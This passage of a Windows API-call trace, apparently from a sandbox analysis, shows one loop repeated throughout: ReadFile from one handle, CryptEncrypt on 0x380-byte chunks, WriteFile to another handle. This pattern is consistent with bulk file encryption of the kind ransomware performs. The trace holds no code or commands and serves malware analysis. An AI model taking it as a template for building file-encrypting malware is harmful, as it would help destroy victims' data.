dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.794] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.794] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.794] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.794] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.795] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.795] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.795] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.795] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.795] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.795] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.795] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.795] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.795] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.795] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.795] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.795] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.795] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.796] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.796] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.796] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.796] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.796] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.796] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.796] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.797] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.797] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.797] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.797] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.797] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.797] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.797] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.797] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.797] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.797] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.797] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.797] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.797] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.798] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.798] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.798] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.798] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.798] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.798] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.798] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.798] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.798] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.798] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.798] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.798] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.799] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.799] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.799] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.799] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.799] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.799] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.799] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.799] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.799] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.799] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.799] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.799] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.800] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.800] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.800] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.800] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.803] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.803] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.803] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.803] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.803] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.803] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.803] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.803] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.804] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.804] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.804] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.804] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.804] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.804] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.804] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.804] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.804] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.804] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.804] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.804] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.805] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.805] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.805] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.805] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.805] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.805] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.805] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.805] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.805] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.805] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.805] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.805] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.806] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.806] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.806] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.806] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.806] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.806] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 